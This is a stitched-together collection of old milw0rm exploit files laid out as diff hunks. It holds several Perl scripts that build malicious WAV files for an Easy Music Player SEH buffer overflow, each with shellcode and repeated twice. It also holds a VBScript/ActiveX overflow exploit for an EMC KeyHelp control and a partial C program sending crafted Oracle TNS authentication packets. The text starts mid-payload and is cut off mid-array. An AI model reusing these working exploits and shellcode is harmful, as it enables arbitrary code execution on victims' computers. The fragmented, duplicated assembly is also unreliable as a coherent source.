"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
###################################################################
my $overflow="\x41" x 4128;
my $jmp="\x6F\xBA\x2D\x15";# Universal
my $nop="\x90" x 20;
###################################################################
open(myfile,'>> ahwak2000.wav');
print myfile $overflow.$jmp.$nop.$shellcode;
###################################################################
# milw0rm.com [2009-08-11]
#!/usr/bin/perl
# by ahwak2000
# email: 0.w[at]w.cn
# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)
# http://www.otbcode.com/downloads/easymusicsetup.exe
###################################################################
my $shellcode=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
###################################################################
my $overflow="\x41" x 4128;
my $jmp="\x6F\xBA\x2D\x15";# Universal
my $nop="\x90" x 20;
###################################################################
open(myfile,'>> ahwak2000.wav');
print myfile $overflow.$jmp.$nop.$shellcode;
###################################################################
# milw0rm.com [2009-08-11]


@ -1,39 +1,39 @@
#!/usr/bin/perl
# by ThE g0bL!N
#Big thnx: His0k4
#easy Music Player 1.0.0.2(wav) local Buffer Overflow Exploit (SEH)
##################################################################
my $bof="\x41" x 4132;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xB8\x15\xC6\x72";
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> dz.wav');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################
# milw0rm.com [2009-08-11]
#!/usr/bin/perl
# by ThE g0bL!N
#Big thnx: His0k4
#easy Music Player 1.0.0.2(wav) local Buffer Overflow Exploit (SEH)
##################################################################
my $bof="\x41" x 4132;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xB8\x15\xC6\x72";
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> dz.wav');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################
# milw0rm.com [2009-08-11]


@ -1,41 +1,41 @@
#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# first http://www.milw0rm.com/exploits/9412
# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)
# http://www.otbcode.com/downloads/easymusicsetup.exe
############################################################################
my $bof="\x41" x 4132;
my $nsh="\xEB\x06\x90\x90";
my $seh="\x27\x4a\x01\x10";##lame_enc.dll## unvi
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> HACK4LOVE.wav');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################
# milw0rm.com [2009-08-12]
#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# first http://www.milw0rm.com/exploits/9412
# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)
# http://www.otbcode.com/downloads/easymusicsetup.exe
############################################################################
my $bof="\x41" x 4132;
my $nsh="\xEB\x06\x90\x90";
my $seh="\x27\x4a\x01\x10";##lame_enc.dll## unvi
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> HACK4LOVE.wav');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################
# milw0rm.com [2009-08-12]


@ -1,60 +0,0 @@
<!--
EMC multiple products KeyWorks KeyHelp Module (keyhelp.ocx 1.2.312) remote
buffer overflow exploit
(ie8 xp sp3)
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
tested products:
EMC Captiva QuickScan Pro 4.6 sp1
EMC Documentum ApllicationXtender Desktop 5.4
and possibly other products carrying quickscan
CLSID: {B7ECFD41-BE62-11D2-B9A8-00104B138C8C}
Progid: KeyHelp.KeyCtrl.1
Binary Path: C:\WINDOWS\system32\KeyHelp.ocx
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
JumpMaddedID() and JumpURL() methods suffer of the same stack based buffer overflow
eip is overwritten after 537 bytes through the second argument, you can touch SEH even
-->
<html>
<object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C' id='KEYHELPLib' />
</object>
<script language='vbscript'>
//executing calc
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
jnk = string(537,"A")
eip = unescape("%67%41%41%7e") '0x7E414167 call esp user32.dll
nop = string(16,unescape("%90"))
mapID=1
pstrChmFile= jnk + eip + nop + scode
pstrFrame="aaaaaaaa"
'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame
KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame
</script>


@ -1,386 +0,0 @@
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <assert.h>
#include <string>
void s_send (SOCKET s, char *msg, DWORD size)
{
int sent;
printf ("s_send: begin: %d bytes\n", size);
sent=send (s, (char*)msg, size, 0);
if (sent==SOCKET_ERROR)
{
printf ("send() -> SOCKET_ERROR, WSAGetLastError=%d\n", WSAGetLastError());
} else
if (sent!=size)
printf ("sent only %d bytes\n", sent);
printf ("s_send: end\n");
};
void s_recv (SOCKET s)
{
char buf[20000];
int r;
struct timeval t;
fd_set fd;
t.tv_sec=0;
t.tv_usec=100000; // 100 ms
printf ("s_recv: begin\n");
FD_ZERO(&fd);
FD_SET(s, &fd);
if (select (0, &fd, 0, 0, &t))
// if (select (0, &fd, 0, 0, NULL))
{
r=recv (s, buf, 20000, 0);
if (r!=0 && r!=-1)
{
printf ("got %d bytes\n", r);
}
else
{
printf ("connection lost, r=%d\n", r);
};
}
else
{
printf ("select() returns zero\n");
};
};
unsigned char NSPTCN[]=
{
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x01, 0x3A, 0x01, 0x2C, 0x00, 0x41, 0x20, 0x00,
0x7F, 0xFF, 0xC6, 0x0E, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x02, 0x00,
//^^ ^^ cmd len
0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
};
#define NSPTCN_HEADER_LEN 58
unsigned char NSPTDA[]=
{
0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
// ^^ ^^ packet len
0x00, 0x00
};
#define NSPTDA_HEADER_LEN 10
void s_send_NSPTDA (SOCKET s, char *msg, int size)
{
char * buf;
int sz=size + NSPTDA_HEADER_LEN;
buf=(char*)malloc (sz);
NSPTDA[0]=( sz ) >> 8;
NSPTDA[1]=( sz ) & 0xFF;
memcpy (buf, NSPTDA, NSPTDA_HEADER_LEN);
memcpy (buf + NSPTDA_HEADER_LEN, msg, size);
printf ("s_send_NSPTDA: sending %d bytes...\n", sz);
s_send (s, (char*)buf, sz);
free (buf);
};
void s_send_TNS_command (SOCKET s, const char *cmd)
{
unsigned char * pkt;
int cmd_len=strlen (cmd);
printf ("sending [%s]\n", cmd);
printf ("len: %d\n", cmd_len);
if (cmd_len<231)
{
int str_len=strlen(cmd);
int pkt_len=str_len+58;
pkt=(unsigned char*)malloc (str_len+58);
memcpy (pkt,
"\x00\x00\x00\x00\x01\x00\x00\x00"
// plenH, plenL
"\x01\x3A\x01\x2C\x00\x41\x20\x00"
"\x7F\xFF\xC6\x0E\x00\x00\x01\x00"
"\x00\x00\x00\x3A\x00\x00\x02\x00"
// cmdlenH cmdlenL
"\x61\x61\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00", 58);
memcpy (pkt+58, cmd, str_len);
pkt[1]=pkt_len&0xFF;
pkt[0]=(pkt_len>>8)&0xFF;
pkt[25]=str_len&0xFF;
pkt[24]=(str_len>>8)&0xFF;
s_send (s, (char*)pkt, pkt_len);
free (pkt);
}
else
{
// something should be modified here in NSPTCN
assert (0);
};
};
bool try_host (char * h)
{
struct hostent *hp;
WSADATA wsaData;
struct sockaddr_in sin;
int r;
struct timeval t;
fd_set fd;
SOCKET s;
char pkt1318[1318];
WSAStartup(MAKEWORD(1, 1), &wsaData);
hp=gethostbyname (h);
assert (hp!=NULL);
s=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
assert (s!=INVALID_SOCKET);
{
u_long on=1;
assert (ioctlsocket(s, FIONBIO, &on) != -1);
};
sin.sin_family=AF_INET;
sin.sin_port=htons(1521);
memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);
r=connect(s, (struct sockaddr *)&sin, sizeof(sin));
t.tv_sec=3;
t.tv_usec=0;
FD_ZERO(&fd);
FD_SET(s, &fd);
if (select (0, 0, &fd, 0, &t))
{
printf ("connected to %s\n", h);
s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
// waiting for NSPTRS
s_recv(s);
s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
// waiting for NSPTAC
s_recv(s);
// send NA packet
s_send (s,
"\x00\x9C\x00\x00\x06\x00\x00\x00\x00\x00\xDE\xAD\xBE\xEF\x00\x92"
"\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00"
"\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71"
"\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00"
"\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00"
"\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00"
"\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00"
"\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A"
"\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00"
"\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01"
,156);
s_recv (s);
// send TTIPRO
s_send (s,
"\x00\x25\x00\x00\x06\x00\x00\x00\x00\x00\x01\x06\x05\x04\x03\x02"
"\x01\x00\x49\x42\x4D\x50\x43\x2F\x57\x49\x4E\x5F\x4E\x54\x2D\x38"
"\x2E\x31\x2E\x30\x00"
, 37);
s_recv (s);
// send TTIDTY
s_send (s,
"\x00\x4B\x00\x00\x06\x00\x00\x00\x00\x00\x02\xB2\x00\xB2\x00\xD2"
"\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01"
"\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01"
"\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00"
"\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07"
, 75);
s_recv (s);
// call OSESSKEY
s_send (s,
"\x00\xDA\x00\x00\x06\x00\x00\x00\x00\x00\x03\x76\x02\xFE\xFF\xFF"
"\xFF\x05\x00\x00\x00\x01\x00\x00\x00\xFE\xFF\xFF\xFF\x05\x00\x00"
"\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0D"
"\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41"
"\x4C\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F"
"\x00\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D"
"\x5F\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65"
"\x78\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F"
"\x4D\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B"
"\x47\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08"
"\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00"
"\x09\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00"
"\x00\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06"
"\x64\x65\x6E\x6E\x69\x73\x00\x00\x00\x00"
, 218);
// call OAUTH
memcpy (pkt1318,
"\x05\x26\x00\x00\x06\x00\x00\x00\x00\x00\x03\x73\x03\xFE\xFF\xFF"
"\xFF\x05\x00\x00\x00\x01\x01\x00\x00\xFE\xFF\xFF\xFF\x12\x00\x00"
"\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0C"
"\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x53\x45\x53\x53\x4B\x45\x59"
"\x40\x00\x00\x00\x40\x36\x33\x41\x45\x31\x36\x41\x30\x44\x31\x41"
"\x46\x31\x45\x39\x33\x37\x41\x44\x36\x36\x46\x34\x46\x31\x35\x36"
"\x37\x31\x30\x33\x30\x34\x46\x36\x36\x30\x31\x44\x30\x45\x33\x35"
"\x34\x37\x46\x42\x46\x39\x35\x34\x39\x37\x34\x32\x33\x30\x42\x43"
"\x30\x36\x45\x34\x30\x01\x00\x00\x00\x0D\x00\x00\x00\x0D\x41\x55"
"\x54\x48\x5F\x50\x41\x53\x53\x57\x4F\x52\x44\x40\x00\x00\x00\x40"
"\x36\x31\x37\x35\x31\x42\x45\x35\x34\x37\x31\x30\x44\x45\x41\x46"
"\x38\x46\x42\x33\x34\x32\x45\x36\x32\x41\x45\x35\x30\x45\x44\x38"
"\x45\x43\x38\x30\x39\x33\x31\x44\x33\x44\x45\x34\x42\x33\x41\x37"
"\x34\x35\x38\x37\x45\x36\x46\x32\x36\x46\x37\x45\x45\x30\x34\x34"
"\x00\x00\x00\x00\x08\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x52\x54"
"\x54\x05\x00\x00\x00\x05\x32\x38\x30\x32\x38\x00\x00\x00\x00\x0D"
"\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x43\x4C\x4E\x54\x5F\x4D\x45"
"\x4D\x04\x00\x00\x00\x04\x34\x30\x39\x36\x00\x00\x00\x00\x0D\x00"
"\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41\x4C"
"\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F\x00"
"\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D\x5F"
"\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65\x78"
"\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x4D"
"\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B\x47"
"\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08\x00"
